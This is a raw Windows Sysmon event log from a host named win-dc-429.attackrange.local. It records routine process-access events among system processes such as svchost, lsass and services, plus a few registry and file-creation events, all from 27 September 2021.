09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052856Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052855Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052854Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052853Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052852Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052851Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052850Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052849Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052848Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052847Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.217{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052846Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.201{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001052845Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.201{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052844Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.201{5EBD8912-8CC1-6151-1B00-00000000FD01}20282104C:\Windows\system32\conhost.exe{5EBD8912-8CC1-6151-1900-00000000FD01}2004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052843Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.201{5EBD8912-8CC1-6151-1A00-00000000FD01}20162100C:\Windows\system32\conhost.exe{5EBD8912-8CC0-6151-1800-00000000FD01}1952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052842Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.201{5EBD8912-8CBD-6151-0A00-00000000FD01}624708C:\Windows\system32\services.exe{5EBD8912-8CC1-6151-1F00-00000000FD01}2076C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052841Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.201{5EBD8912-8CC1-6151-1E00-00000000FD01}19962092C:\Windows\system32\conhost.exe{5EBD8912-8CC1-6151-1D00-00000000FD01}1764C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052840Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.185{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CC1-6151-1F00-00000000FD01}2076C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052839Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.185{5EBD8912-8CBD-6151-0A00-00000000FD01}624716C:\Windows\system32\services.exe{5EBD8912-8CC1-6151-1F00-00000000FD01}2076C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052838Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:01.185{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000007ad) 10341000x80000000000000001052837Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052836Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052835Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.185{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052834Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:01.185{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Schedule\FailureActionsBinary Data 10341000x80000000000000001052833Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.170{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CC1-6151-1E00-00000000FD01}1996C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052832Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.170{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CC1-6151-1D00-00000000FD01}1764C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052831Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.170{5EBD8912-8CC0-6151-1600-00000000FD01}1296380C:\Windows\system32\svchost.exe{5EBD8912-8CC1-6151-1D00-00000000FD01}1764C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+65878|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001052830Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.154{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exeC:\Windows\System32\wbem\Repository\WRITABLE.TST2021-09-27 09:20:01.154 13241300x80000000000000001052829Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:01.154{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000001052828Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.154{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052827Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 